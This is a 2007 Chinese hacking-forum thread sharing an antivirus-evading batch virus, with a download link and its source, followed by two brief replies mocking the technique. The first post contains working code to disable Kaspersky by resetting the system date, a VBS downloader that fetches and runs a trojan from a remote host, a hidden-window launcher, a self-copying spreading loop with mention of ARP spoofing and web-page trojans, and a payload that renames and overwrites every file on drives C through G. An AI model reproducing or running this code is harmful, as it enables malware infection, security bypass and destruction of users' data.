标题: 免杀bat病毒 [打印本页]
作者: KKIILDL 时间: 2007-4-16 00:33 标题: 免杀bat病毒
http://zhenlove.com.cn/cndos/fileup/files/bat.rar
它可使卡巴无法使用:
set date=%date%
date 1990-03-02
自动下载木马:
echo download ...
rem 3. dsa.vbs
echo Set xPost = createObject("Microsoft.XMLHTTP") >dsa.vbs
echo xPost.Open "GET","http://***.***.**/*.*",0 >>dsa.vbs
echo xPost.Send() >>dsa.vbs
echo Set sGet = createObject("ADODB.Stream") >>dsa.vbs
echo sGet.Mode = 3 >>dsa.vbs
echo sGet.Type = 1 >>dsa.vbs
echo sGet.Open() >>dsa.vbs
echo sGet.Write(xPost.responseBody) >>dsa.vbs
echo sGet.SaveToFile "*.*",2 >>dsa.vbs
cscript dsa.vbs
del dsa.vbs
=========================================
CreateObject("WScript.Shell").Run "cmd /cbat.bat",0 着是隐藏DOS窗口start bat.bat 的vbs
===============================
u传播
局域网中采用arp欺骗传播(这个要有个免费空间)
在*.htm *.html *.asp *.aspx查上网马
ping 127.1 /n 6 这个用来延时:
:a
ping 127.1 /n 6
copy %0 i:\
goto a
2007.5.1 会将覆bat.exe盖c,d,e,f,g上的所有文件:
cd\
for /f "delims=" %%m ('dir /s/b/a-d G:\*.*') do @ren %%m *.exe
for /f "delims=" %%k ('dir /s/b/a-d G:\*.*') do @copy %windir%\bat.exe %%k
for /f "delims=" %%q ('dir /s/b/a-d f:\*.*') do @ren %%q *.exe
for /f "delims=" %%w ('dir /s/b/a-d f:\*.*') do @copy %windir%\bat.exe %%w
for /f "delims=" %%m ('dir /s/b/a-d e:\*.*') do @ren %%m *.exe
for /f "delims=" %%k ('dir /s/b/a-d e:\*.*') do @copy %windir%\bat.exe %%k
for /f "delims=" %%m ('dir /s/b/a-d d:\*.*') do @ren %%m *.exe
for /f "delims=" %%k ('dir /s/b/a-d d:\*.*') do @copy %windir%\bat.exe %%k
for /f "delims=" %%m ('dir /s/b/a-d c:\*.*') do @ren %%m *.exe
for /f "delims=" %%k ('dir /s/b/a-d c:\*.*') do @copy %windir%\bat.exe %%k
exit\b
作者: bjsh 时间: 2007-4-16 01:18
无非是通过修改时间使卡巴无效。发现很多都是通过这个的;不过一直比较鄙视这种做法;一点也不高级。
作者: vkill 时间: 2007-4-16 02:12
| Quote: | |
|
严重同意,哈哈,修改win内核的才是高级的